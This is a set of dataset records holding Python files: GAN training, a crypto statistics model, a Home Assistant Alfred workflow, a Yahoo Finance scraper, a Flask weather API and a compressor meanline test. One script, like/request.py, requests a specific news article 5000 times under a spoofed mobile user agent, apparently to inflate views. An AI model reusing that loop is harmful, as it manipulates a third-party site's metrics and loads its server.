inf_train_gen(name, gen):\n while True:\n for images in gen():\n yield images[0].reshape([BATCH_SIZE, -1])\n\n for name, p, path in ds:\n if p != 0:\n if name == 'cifar':\n train_gen, _ = lib.cifar10.load(BATCH_SIZE, data_dir=path)\n else:\n train_gen, _ = dataloader.load(BATCH_SIZE, data_dir=path,\\\n imsize=N_H,validation_ratio=0)\n gen_list.append(inf_train_gen(name, train_gen))\n p_list.append(p)\n\n def inf_train_gen_mix():\n while True:\n count = np.random.multinomial(BATCH_SIZE, p_list)\n for i in range(1, len(count)):\n count[i] += count[i - 1]\n count = [0] + list(count)\n # print(count)\n image_list = []\n for i, gen in enumerate(gen_list):\n images = gen.next()[count[i]:count[i + 1]]\n image_list.append(images)\n images = np.concatenate(image_list)\n yield images\n\n return inf_train_gen_mix\n\nprint_model_size(tag='gen',var_list=gen_params)\nprint_model_size(tag='dis',var_list=disc_params)\nprint_model_size(tag='all_params')\n\n# Train loop\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nconfig.allow_soft_placement = True\nsession = tf.Session(config=config)\nsession.run(tf.global_variables_initializer())\n\nif WORKMODE == 'train':\n inf_train_gen = make_dataset_gen(DATASETS)\n gen = inf_train_gen()\n #save a batch of real images\n real_samples = gen.next().astype('int32').reshape((BATCH_SIZE, N_C, N_H, N_W))\n lib.save_images.save_images(real_samples,EXPERIMENT_DIR+'/real_samples.png')\nsaver = tf.train.Saver(max_to_keep=None)\nif(CHECKPOINT_NAME!=None):\n saver.restore(session,CHECKPOINT_NAME)\n lib.plot.load(log_dir=EXPERIMENT_DIR,iter_start=ITER_START)\n print(\"model restroed from \" + CHECKPOINT_NAME)\n\nif WORKMODE == 'train':\n for iteration in trange(ITER_START, ITERS):\n start_time = time.time()\n # Train generator\n if iteration > 0:\n _ = session.run(gen_train_op,{global_step:iteration})\n \n #print deligan debug info\n if GEN_TYPE == 'deligan' and (iteration % 250 == 249 or iteration - ITER_START < 5):\n deligan_scales_, deligan_biases_ = session.run([deligan_scales, deligan_biases])\n\n print('mean_deligan_scales = {}' \\\n .format(np.mean(deligan_scales_, axis=0).astype('float64').round(4)))\n if iteration == ITER_START:\n deligan_scales_old, deligan_biases_old = deligan_scales_, deligan_biases_\n else:\n deligan_scales_change = np.abs(deligan_scales_old - deligan_scales_).sum()\n deligan_biases_change = np.abs(deligan_biases_old - deligan_biases_).sum()\n print('deligan_scales_change = {:.6f}, deligan_biases_change = {:.6f}' \\\n .format(deligan_scales_change, deligan_biases_change))\n deligan_scales_old, deligan_biases_old = deligan_scales_, deligan_biases_\n\n # Train critic\n if MODE == 'dcgan':\n disc_iters = 1\n else:\n disc_iters = CRITIC_ITERS\n \n if TRAIN_P_PERIOD > 0:# if trainable categorical probabilities\n EDG_j_list = []\n F_batch_list = []\n disc_fake_batch_list = []\n\n for i in xrange(disc_iters):\n if not TRAIN_P_PERIOD > 0: # if fixed categorical probabilities\n _data = gen.next()\n _disc_cost, _ = session.run([disc_cost, disc_train_op],\n feed_dict={real_data_int: _data,global_step:iteration})\n else: # if trainable categorical probabilities\n _data = gen.next()\n _disc_cost, _,F_,disc_fake_ = session.run(\n [disc_cost, disc_train_op,F,disc_fake], \n feed_dict={real_data_int: _data,global_step:iteration})\n F_batch_list.append(F_)\n disc_fake_batch_list.append(disc_fake_)\n lib.plot.plot('train disc cost', _disc_cost)\n\n # learn categorical probabilities\n if TRAIN_P_PERIOD > 0:\n if iteration % TRAIN_P_PERIOD == TRAIN_P_PERIOD - 1 and iteration >= TRAIN_P_START:\n F_batch_list = np.concatenate(F_batch_list)\n disc_fake_batch_list = np.concatenate(disc_fake_batch_list)\n for j in range(N_SUBGEN):\n count_j = np.sum(F_batch_list[:,j])\n if count_j == 0:\n print('WARNING: gen_{} seems dead!'.format(j))\n count_j += 1e-3 #avoid zero division error\n EDG_j = np.sum(disc_fake_batch_list * F_batch_list[:,j]) / (count_j)\n EDG_j_list.append(EDG_j)\n _, p_,p_lr_ = session.run([p_train_op, p,p_lr],\n feed_dict={EDGs: EDG_j_list,global_step:iteration})\n if iteration % 50 == 0:\n print('EDG_j_list = {},p_lr={:.5f}'.format(EDG_j_list,p_lr_))\n print('p_ = {}'.format(p_))\n else:\n p_ = session.run(p)\n for i, p_i in enumerate(p_):\n lib.plot.plot('p_{}'.format(i), p_i)\n \n # if (ENABLE_DIS_CLS_LOSS or ENABLE_GEN_CLS_LOSS):\n # lib.plot.plot('classifier cost', _cls_loss)\n lib.plot.plot('time', time.time() - start_time)\n if iteration % SAVE_SAMPLES_PERIOD == SAVE_SAMPLES_PERIOD - 1:\n samples_50k = save_samples_to_npz(50000, iteration)\n if CALC_INCEPTION_SCORE:\n inception_score = get_inception_score(iteration, samples_50k)\n lib.plot.plot('inception score', inception_score[0])\n\n if iteration % PREVIEW_PERIOD == PREVIEW_PERIOD - 1:\n generate_image(iteration)\n\n # Save logs every 100 iters\n if (iteration < 5) or (iteration % 500 == 499):\n lib.plot.flush(log_dir=EXPERIMENT_DIR,header=EXPERIMENT_NAME)\n\n if (iteration % SAVE_CHECKPOINT_PERIOD == (SAVE_CHECKPOINT_PERIOD - 1)):\n try:\n while True:\n saver.save(session, CHECKPOINT_DIR + \"/my_model\", \\\n global_step=iteration)\n break\n except OSError as e:\n print(\"OSError when saving log, retry after 60s\")\n print(e)\n time.sleep(60)\n except IOError as e:\n print(\"IOError when saving log, retry after 60s\")\n print(e)\n time.sleep(60) \n\n lib.plot.tick()\n if TRAIN_P_PERIOD > 0 and iteration == ITERS - 1: # log last p to txt\n with open(EXPERIMENT_DIR + '/' + 'p_{:.4f}.txt'\\\n .format(p_.min()),mode='a') as f:\n for i,p_i in enumerate(p_):\n f.write('p{}\\t{:.8f}\\n'.format(i,p_i))\n print('Training finished!')\nelse: # WORKMODE == 'generate'\n generate_image('final')\n print('Generating finished!')\n\n","sub_path":"wgan-gp-DC-32x32-10subgen-vcgan-lr0.0001-dt3.0-tpp0-cifar-it200000-inp_con-d64g64-run1.py","file_name":"wgan-gp-DC-32x32-10subgen-vcgan-lr0.0001-dt3.0-tpp0-cifar-it200000-inp_con-d64g64-run1.py","file_ext":"py","file_size_in_byte":28651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641001896","text":"from datetime import datetime\n\n\nclass Statistics:\n \"\"\" Model representing summary statistics of a cryptocurrency \"\"\"\n\n def __init__(self, no_blocks, no_address_relations, no_addresses,\n no_clusters, no_txs, no_tags, timestamp, currency):\n tstamp = datetime.utcfromtimestamp(timestamp) \\\n .strftime(\"%Y-%m-%d %H:%M:%S\")\n ledger = {'visible_name': currency.upper() + ' Blockchain',\n 'id': currency + '_ledger',\n 'version': {'nr': str(no_blocks), 'timestamp': tstamp},\n 'report_uuid': currency + '_ledger'}\n self.no_blocks = no_blocks\n self.no_address_relations = no_address_relations\n self.no_addresses = no_addresses\n self.no_entities = no_clusters\n self.no_txs = no_txs\n self.no_labels = no_tags\n self.timestamp = timestamp\n self.tools = []\n self.data_sources = [ledger]\n self.notes = []\n\n @staticmethod\n def from_row(row, currency):\n return Statistics(row.no_blocks, row.no_address_relations,\n row.no_addresses, row.no_clusters,\n row.no_transactions, row.no_tags, row.timestamp,\n currency)\n\n def to_dict(self):\n return self.__dict__\n","sub_path":"gsrest/model/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319534201","text":"import home_assistant as util\nimport icon as icon\nimport sys\nimport argparse\nfrom workflow import (Workflow, ICON_WEB, ICON_INFO, ICON_WARNING, PasswordNotFound)\nfrom workflow.background import run_in_background, is_running\n\ndef main(wf):\n\n\t####################################################################\n # Get init data\n ####################################################################\n parser = argparse.ArgumentParser()\n parser.add_argument('query', nargs='?', default=None)\n args = parser.parse_args(wf.args)\n\n password = util.getPassword(wf);\n url = util.getURL(wf);\n\n ####################################################################\n # Fetch all data in background if the query is empty\n ####################################################################\n if args.query == None:\n if not is_running('update'):\n cmd = ['/usr/bin/python', wf.workflowfile('update_data.py')]\n run_in_background('update', cmd)\n\n data = util.getData(wf, 'light')\n\n def search_key_for_post(post):\n \"\"\"Generate a string search key for a post\"\"\"\n item = data[post]\n\n elements = []\n elements.append(item['name']) # title of post\n elements.append(item['friendly_name'])\n elements.append(item['entity_id'])\n\n return u' '.join(elements)\n\n def wrapper():\n return data\n\n posts = wf.cached_data('allLights', wrapper, max_age=1)\n\n # If script was passed a query, use it to filter posts\n if args.query and data:\n \tposts = wf.filter(args.query, data, key=search_key_for_post, min_score=20)\n\n if not posts: # we have no data to show, so show a warning and stop\n wf.logger.info(\"hi\")\n wf.add_item('No posts found', icon=ICON_WARNING)\n wf.send_feedback()\n return 0\n\n\n # Loop through the returned posts and add an item for each to\n # the list of results for Alfred\n #for post in posts:\n\n for post in posts:\n #sys.stderr.write(\"post : \" + str(post) + '\\n')\n item = data[post];\n subtitle = ''\n\n if item['state'] != 'unavailable':\n\n if item['state'] == 'on':\n ICON = icon.getIcon('light-on', 'w')\n subtitle = ' to turn OFF light'\n else:\n ICON = icon.getIcon('light-off', 'b')\n subtitle = ' to turn ON light'\n\n wf.add_item(title=item['friendly_name'],\n subtitle=subtitle,\n valid=True,\n arg=item['entity_id'],\n icon=ICON)\n\n # Send the results to Alfred as XML\n wf.send_feedback()\n return 0;\n\nif __name__ == '__main__':\n wf = Workflow()\n log = wf.logger\n sys.exit(wf.run(main))\n","sub_path":"alfred/Alfred.alfredpreferences/workflows/user.workflow.B7E8DDC9-1D46-4092-B2ED-6C223C606FF6/ha_lights.py","file_name":"ha_lights.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29354264","text":"class View:\n def perform_log(self, command):\n print('Command `{0}` successfuly performed'.format(command))\n\n def fetch_data_log(self, titles, data):\n t = \"\"\n for title in titles:\n t += \"{:25}\".format(title)\n print(t)\n\n for row in data:\n str_row = \"\"\n for el in row:\n str_row += \"{:25}\".format(str(el))\n print(str_row)\n ","sub_path":"lab2/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"604018805","text":"from bs4 import BeautifulSoup\nimport requests as re\n\ndef get_soup(url: str, html: str = None) -> BeautifulSoup:\n if html is None:\n response = re.get(url)\n text = response.text\n else:\n text = html\n return BeautifulSoup(text,features=\"html.parser\")\n\ndef get_recent_val(key,yahoo_soup):\n val = yahoo_soup.select(f\"div:has(> div[title=\\\"{key}\\\" i]) + div > span\")\n assert len(val) == 1\n val = val[0]\n return val.text\n\nclass YahooTicker:\n def __init__(self, ticker: str, htmls: dict = None):\n self.ticker = ticker.strip()\n base_url = f\"https://finance.yahoo.com/quote/{self.ticker}/\"\n fin_url = base_url + f\"financials?p={self.ticker}\"\n bal_sheet_url = base_url + f\"balance-sheet?p={self.ticker}\"\n stat_url = base_url + f\"key-statistics?p={self.ticker}\"\n if htmls is None:\n htmls = {\"fin\": None, \"bal\": None,\"stat\":None}\n self.fin_soup = get_soup(fin_url, htmls[\"fin\"])\n self.bal_sheet_soup = get_soup(bal_sheet_url,htmls[\"bal\"])\n self.stat_soup = get_soup(stat_url,htmls[\"stat\"])\n def get_market_cap(self):\n list_res = self.stat_soup.select(\"td:has(> span:contains(\\\"Market Cap\\\")) + td\")\n if len(list_res) != 1:\n raise ValueError(\"had multiple returns for css selector\")\n \n return list_res[0].text\n def get(self,key: str):\n try:\n return get_recent_val(key,self.fin_soup)\n except:\n try:\n return get_recent_val(key,self.bal_sheet_soup)\n except:\n return None\n def tuple_get(self, keys: list) -> tuple:\n \"\"\"\n Will return a tuple with the first value being the ticker string\n followed by the values returned from self.get for each of\n the keys in keys\n \"\"\"\n temp_list = [self.ticker]\n for key in keys:\n temp_list.append(self.get(key))\n return tuple(temp_list)\n\nif __name__ == \"__main__\":\n file = open(\"../Analysis/downloads2/FMAO_stat.html\",\"r\")\n print(get_market_cap(\"\".join(file.readlines())))\n file.close()\n","sub_path":"WebApp/yahoo_functions_revamp.py","file_name":"yahoo_functions_revamp.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"153177364","text":"import urllib.request\nfrom urllib.error import HTTPError,URLError\nimport socket\n\ntimeout = 2\nsocket.setdefaulttimeout(timeout)\n\n# 模仿浏览器\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-agent', 'Dalvik/2.1.0 (Linux; U; Android 7.0; \\\n SM-G9300 Build/NRD90M)')]\n\nurl = 'http://h5.cqliving.com/info/detail/865240.html'\nheaders = {'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.0; \\\n SM-G9300 Build/NRD90M)', 'Cookie': 'PORSESSIONID= \\\n CD277E65F1185AB3A1A8B8EC82833285'}\n\nfor x in range(5000):\n try:\n urllib.request.urlopen(url)\n # opener.open(url)\n # print(x)\n # except HTTPError as e:\n # print(e.message)\n # continue\n # except URLError as e:\n # print(e)\n # continue\n except Exception as e:\n print(e, x)\n continue\n","sub_path":"like/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"317359262","text":"from flask import Flask, jsonify\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\", connect_args={'check_same_thread': False})\n\n\nBase = automap_base()\nBase.prepare(engine, reflect=True)\nBase.classes.keys()\n\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\nsession = Session(engine)\n\n#weather app\napp = Flask(__name__)\n\n\nlatest_date = (session.query(Measurement.date)\n .order_by(Measurement.date.desc())\n .first())\nlatest_date = list(np.ravel(latest_date))[0]\n\nlatest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\nlatest_year = int(dt.datetime.strftime(latest_date, '%Y'))\nlatest_month = int(dt.datetime.strftime(latest_date, '%m'))\nlatest_day = int(dt.datetime.strftime(latest_date, '%d'))\n\nyear_before = dt.date(latest_year, latest_month, latest_day) - dt.timedelta(days=365)\nyear_before = dt.datetime.strftime(year_before, '%Y-%m-%d')\n\n\n\n\n@app.route(\"/\")\ndef home():\n return (f\"Welcome to Surf's Up!: Hawai'i Climate API
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/stations ~~~~~ a list of all weather observation stations
\"\n f\"/api/v1.0/precipitaton ~~ the latest year of preceipitation data
\"\n f\"/api/v1.0/temperature ~~ the latest year of temperature data
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"~~~ datesearch (yyyy-mm-dd)
\"\n f\"/api/v1.0/datesearch/2015-05-30 ~~~~~~~~~~~ low, high, and average temp for date given and each date after
\"\n f\"/api/v1.0/datesearch/2015-05-30/2016-01-30 ~~ low, high, and average temp for date given and each date up to and including end date
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\"\n f\"~ data available from 2010-01-01 to 2017-08-23 ~
\"\n f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n results = session.query(Station.name).all()\n all_stations = list(np.ravel(results))\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/precipitaton\")\ndef precipitation():\n \n results = (session.query(Measurement.date, Measurement.prcp, Measurement.station)\n .filter(Measurement.date > yearBefore)\n .order_by(Measurement.date)\n .all())\n \n precipData = []\n for result in results:\n precipDict = {result.date: result.prcp, \"Station\": result.station}\n precipData.append(precipDict)\n\n return jsonify(precipData)\n\n@app.route(\"/api/v1.0/temperature\")\ndef temperature():\n\n results = (session.query(Measurement.date, Measurement.tobs, Measurement.station)\n .filter(Measurement.date > yearBefore)\n .order_by(Measurement.date)\n .all())\n\n tempData = []\n for result in results:\n tempDict = {result.date: result.tobs, \"Station\": result.station}\n tempData.append(tempDict)\n\n return jsonify(tempData)\n\n@app.route('/api/v1.0/datesearch/')\ndef start(startDate):\n sel = [Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n results = (session.query(*sel)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) >= startDate)\n .group_by(Measurement.date)\n .all())\n\n dates = [] \n for result in results:\n date_dict = {}\n date_dict[\"Date\"] = result[0]\n date_dict[\"Low Temp\"] = result[1]\n date_dict[\"Avg Temp\"] = result[2]\n date_dict[\"High Temp\"] = result[3]\n dates.append(date_dict)\n return jsonify(dates)\n\n@app.route('/api/v1.0/datesearch//')\ndef startEnd(startDate, endDate):\n sel = [Measurement.date, func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n results = (session.query(*sel)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) >= startDate)\n .filter(func.strftime(\"%Y-%m-%d\", Measurement.date) <= endDate)\n .group_by(Measurement.date)\n .all())\n\n dates = [] \n for result in results:\n date_dict = {}\n date_dict[\"Date\"] = result[0]\n date_dict[\"Low Temp\"] = result[1]\n date_dict[\"Avg Temp\"] = result[2]\n date_dict[\"High Temp\"] = result[3]\n dates.append(date_dict)\n return jsonify(dates)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81921788","text":"import requests\nimport time\nimport random\n\n\nip='10.14.33.23'\n\nfor i in range(1,10):\n\tx=random.uniform(1,255)\n\tx=round(x,3)\n\tr = requests.get('http://'+ip+'/prueva/iot.php?valor='+str(x))\n\tr.status_code\n\ttime.sleep(10)\n","sub_path":"prueva/old/date_for_db.py","file_name":"date_for_db.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"222073287","text":"'''\nCreated on Feb 20, 2013\n\n@author: bachm03j\n'''\n\n\n# module attributes\n__version__ = \"0.1.0\"\n__author__ = \"Jonathan Bachmann\"\n__maintainer__ = \"Jonathan Bachmann\"\n__email__ = \"jonathan.bachmann@siemens.com\"\n__status__ = \"development\"\n\nimport math\n\nfrom compressorbvbase import CompressorBVBase as cbase\nfrom compressorblade import CompressorBlade\nfrom compressorbladehpa import CompressorBladeHpa\nfrom compressorvane import CompressorVane\nfrom compressorvanehpa import CompressorVaneHpa\nfrom compressorstation import CompressorStation\nfrom modelhpa import HpaModel\nfrom siethermopy import SieRealGas\n\n\ndef printStagePerfHdr():\n print ( '{0:<15s}{1:<15s}{2:<15s}{3:<15s}{4:<15s}{5:<15s}{6:<15s}{7:<15s}{8:<15s}{9:<15s}{10:<15s}{11:<15s}{12:<15s}{13:<15s}{14:<15s}{15:<15s}'.format('stage' \\\n ,'rtr_ptot' \\\n ,'rtr_ttot' \\\n ,'massflow' \\\n ,'temp_rise' \\\n ,'rtr_pi' \\\n ,'stg_pi' \\\n ,'rtr_etai' \\\n ,'stg_etai' \\\n ,'stg_psi' \\\n ,'rtr_phi_in' \\\n ,'str_phi_in' \\\n ,'stg_u_in' \\\n ,'rtr_alp_in' \\\n ,'str_alp_out' \\\n ,'stg_react' \\\n ) )\n\ndef printStagePerf(stgName, tplBldVan):\n cbld, cvan = tplBldVan\n delTstg = cvan.exit.tempTot - cbld.inlet.tempTot\n stgPi = cbld.getTotPR() * cvan.getTotPR()\n rtrEtaI = cbld.getEtaAdiab()\n stgEtaI = rtrEtaI\n stgPsi = cbld.getPsi()\n stgReact = cbld.getDeltaH() / (cvan.exit.h - cbld.inlet.h)\n print ( '{0:<15s}{1:<15f}{2:<15f}{3:<15f}{4:<15f}{5:<15f}{6:<15f}{7:<15f}{8:<15f}{9:<15f}{10:<15f}{11:<15f}{12:<15f}{13:<15f}{14:<15f}{15:<15f}'.format(stgName \\\n , cbld.inlet.pressTot \\\n , cbld.inlet.tempTot \\\n , cbld._massflowIn \\\n , delTstg \\\n , cbld.getTotPR() \\\n , stgPi \\\n , rtrEtaI \\\n , stgEtaI \\\n , stgPsi \\\n , cbld.getPhiIn() \\\n , cvan.getPhiIn() \\\n , cbld.inlet.wheelSpeed(cbld._rotSpeed) \\\n , cbld.inlet.getAlphaDeg() \\\n , cvan.exit.getAlphaDeg() \\\n , stgReact \\\n ) )\n\ndef printStageGasAnglesHdr():\n print ( '{0:<15s}{1:<15s}{2:<15s}{3:<15s}{4:<15s}{5:<15s}{6:<15s}{7:<15s}{8:<15s}{9:<15s}'.format('stage' \\\n ,'rtr_alp_in' \\\n ,'rtr_beta_in' \\\n ,'rtr_beta_out' \\\n ,'str_alp_in' \\\n ,'str_alp_out' \\\n ,'rtr_vaxi_in' \\\n ,'rtr_vtan_in' \\\n ,'sttr_vaxi_in' \\\n ,'sttr_vtan_in' \\\n ) )\n\ndef printStageGasAngles(stgName, tplBldVan):\n cbld, cvan = tplBldVan\n print ( '{0:<15s}{1:<15f}{2:<15f}{3:<15f}{4:<15f}{5:<15f}{6:<15f}{7:<15f}{8:<15f}{9:<15f}'.format(stgName \\\n , cbld.inlet.getAlphaDeg() \\\n , cbld.inlet.getBetaDeg() \\\n , cbld.exit.getBetaDeg() \\\n , cvan.inlet.getAlphaDeg() \\\n , cvan.exit.getAlphaDeg() \\\n , cbld.inlet.vaxi \\\n , cbld.inlet.vtan \\\n , cvan.inlet.vaxi \\\n , cvan.inlet.vtan \\\n ) )\n\n\ndef testMeanline():\n \n # radius ratio values taken directly from the Comp1d annulus inputs (true sail points)\n #radRatioPerStn = [ 1.9882,1.7735 \\\n # ,1.7369,1.5953 \\\n # ,1.5708,1.4574 \\\n # ,1.4398,1.3694 \\\n # ,1.3590,1.3166 \\\n # ,1.3086,1.2808 \\\n # ,1.2747,1.2570 \\\n # ,1.2506,1.2380 \\\n # ,1.2324,1.2212 \\\n # ,1.2168,1.2045 \\\n # ,1.1960,1.1884 \\\n # ,1.1846,1.1733 \\\n # ,1.1703,1.1647 \\\n # ,1.1612,1.1513 \\\n # ,1.1455,1.1403 \\\n # ,1.1371,1.1277 \\\n # ,1.1256,1.1209 \\\n # ,1.1168,1.1098 \\\n # ,1.1074,1.1039 \\\n # ,1.1018,1.0962 \\\n # ,1.0926,1.0896 \\\n # ,1.0882,1.0841 \\\n # ,1.0822,1.0800 \\\n # ,1.0788,1.0751 ]\n \n # rad ratio from taking sail points and making common x location between hub and case at each station\n # consistent with how Comp1D turns 2D rep into 1D (I think)\n radRatioPerStn = [ 1.9773375161,1.7809305647 \\\n ,1.7415957911,1.591923381 \\\n ,1.5664303357,1.4610611084 \\\n ,1.4403778196,1.3691304336 \\\n ,1.3583525406,1.317149218 \\\n ,1.3085937991,1.2808219223 \\\n ,1.2754327297,1.2562956228 \\\n ,1.2502675622,1.2382961183 \\\n ,1.2336211785,1.2200288442 \\\n ,1.2161050098,1.2053132548 \\\n ,1.1969761998,1.1873079686 \\\n ,1.1837131488,1.1741737284 \\\n ,1.1712278624,1.1635557942 \\\n ,1.1605871975,1.1519130378 \\\n ,1.1462350008,1.1394695309 \\\n ,1.1364192302,1.1283031134 \\\n ,1.1261007579,1.1203633402 \\\n ,1.1164138616,1.1103140369 \\\n ,1.1078933834,1.1034460228 \\\n ,1.1014242921,1.0965593835 \\\n ,1.0928436548,1.0893547433 \\\n ,1.0879021809,1.0844413494 \\\n ,1.0824339671,1.0797746678 \\\n ,1.0786344258,1.0753023286 ]\n \n axiGapPerRow = [ 27.89,46.965 \\\n ,34.815,35.65 \\\n ,29.385,30.73 \\\n ,27.86,38.015 \\\n ,36.595,30.145 \\\n ,67.88,29.45 \\\n ,27.035,25.735 \\\n ,48.775,26.27 \\\n ,18.97,36.735 \\\n ,24.39,22.575 \\\n ,43.04,20.015 \\\n ,29.08,17.48 ]\n \n sqcPerRow = [ 0.717, 0.773 \\\n ,0.696, 0.744 \\\n ,0.664, 0.766 \\\n ,0.683, 0.732 \\\n ,0.730, 0.812 \\\n ,0.818, 0.778 \\\n ,0.791, 0.805 \\\n ,0.786, 0.795 \\\n ,0.802, 0.787 \\\n ,0.786, 0.813 \\\n ,0.785, 0.814 \\\n ,0.795, 0.780 \\\n ]\n \n afCntPerRow = [ 21, 38\n ,37, 48\n ,49, 54\n ,55, 64\n ,57, 70\n ,59, 74\n ,67, 82\n ,79, 86\n ,87, 100\n ,99, 106\n ,109, 114\n ,115, 118\n ]\n \n # axi chord in mm\n chrdAxiPerRow = [ 271.3,176.22 \\\n ,161.75,146.265 \\\n ,129.38,120.325 \\\n ,108.275,93.09 \\\n ,96.275,89.925 \\\n ,75.625,85.265 \\\n ,68.48,73.145 \\\n ,59.045,68.54 \\\n ,51.55,58.55 \\\n ,46.93,53.985 \\\n ,43.705,50.15 \\\n ,39.9,49.965 ]\n \n # chord in mm\n chordPerRow = [ 384.83, 200.72\n ,232.72, 170.12\n ,187.73, 147.63\n ,162.02, 129.23\n ,144.58, 105.14\n ,122.78, 102.23\n ,110.27, 87.91\n ,92.65, 83.59\n ,81.45, 71.77\n ,72.22, 64.93\n ,65.08, 59.81\n ,60.5, 59.95\n ]\n \n # thickness to chord\n tqcPerRow = [ 0.057, 0.070 \\\n ,0.063, 0.070 \\\n ,0.064, 0.069 \\\n ,0.061, 0.078 \\\n ,0.064, 0.073 \\\n ,0.064, 0.073 \\\n ,0.064, 0.073 \\\n ,0.065, 0.072 \\\n ,0.064, 0.072 \\\n ,0.065, 0.072 \\\n ,0.066, 0.072 \\\n ,0.064, 0.073 \\\n ]\n \n \n etaAdiabPerRow = [ 0.942, 1.00 \\\n ,0.944, 1.00 \\\n ,0.962, 1.00 \\\n ,0.961, 1.00 \\\n ,0.961, 1.00 \\\n ,0.963, 1.00 \\\n ,0.960, 1.00 \\\n ,0.961, 1.00 \\\n ,0.959, 1.00 \\\n ,0.959, 1.00 \\\n ,0.955, 1.00 \\\n ,0.954, 1.00 \\\n ]\n\n afTypePerRow = [ cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.NONE \\\n ,cbase.AirfoilType.NONE, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ,cbase.AirfoilType.HPA, cbase.AirfoilType.HPA \\\n ]\n \n # phi s_in not used, station is copied from blade exit (modified from Comp1D output)\n # |\n # v\n # r_in r_out s_in s_out\n phiPerStn = [ 0.589, 0.523, 0.525, 0.516 \\\n ,0.552, 0.487, 0.494, 0.498 \\\n ,0.519, 0.452, 0.472, 0.452 \\\n ,0.463, 0.428, 0.443, 0.418 \\\n ,0.430, 0.413, 0.410, 0.403 \\\n ,0.424, 0.411, 0.408, 0.406 \\\n ,0.418, 0.407, 0.409, 0.407 \\\n ,0.425, 0.425, 0.425, 0.430 \\\n ,0.445, 0.445, 0.445, 0.458 \\\n ,0.465, 0.455, 0.455, 0.455 \\\n ,0.461, 0.455, 0.455, 0.458 \\\n ,0.469, 0.455, 0.455, 0.461 ]\n \n \n\n# # values taken from Comp1D output file, others values need to be modified to get good comparisons\n# # phi s_in not used, station is copied from blade exit (modified from Comp1D output), keep the value from Comp1d\n# # |\n# # v\n# phiPerStnDum =[ 0.589, 0.523, 0.534, 0.516 \\\n# ,0.552, 0.487, 0.507, 0.511 \\\n# ,0.528, 0.472, 0.486, 0.444 \\\n# ,0.493, 0.443, 0.461, 0.411 \\\n# ,0.455, 0.410, 0.443, 0.403 \\\n# ,0.454, 0.408, 0.453, 0.403 \\\n# ,0.458, 0.409, 0.458, 0.407 \\\n# ,0.465, 0.425, 0.470, 0.430 \\\n# ,0.485, 0.445, 0.498, 0.458 \\\n# ,0.505, 0.455, 0.510, 0.455 \\\n# ,0.505, 0.455, 0.499, 0.458 \\\n# ,0.511, 0.455, 0.509, 0.461 ]\n \n \n # work coefficient per stage (directly from Comp1D output) DO NOT MODIFY\n psiPerStg = [ 0.358335\n ,0.385189\n ,0.380417\n ,0.360535\n ,0.328285\n ,0.294571\n ,0.288461\n ,0.302315\n ,0.299666\n ,0.322095\n ,0.312355\n ,0.314445\n ]\n \n reactPerStg = [0.651, 0.706, 0.668, 0.623, 0.595, 0.505, 0.501, 0.502, 0.507, 0.499, 0.519, 0.514]\n # JGB - 04/16/2013 : prev test reqrd modification to reaction values, but later found error in vane exit vel resultant calc.\n # after fixing the below reaction values cause non-physical vane exit conditions\n #reactPerStg = [0.544, 0.585, 0.584, 0.557, 0.551, 0.5, 0.491, 0.485, 0.480, 0.475, 0.470, 0.465]\n \n massflowPerStg = [685.183,685.183,685.183,685.183,685.183,679.91,679.91,655.58,655.58,643.25,607.62,607.62]\n \n # calculate number of stages from psi\n numStgs = 7 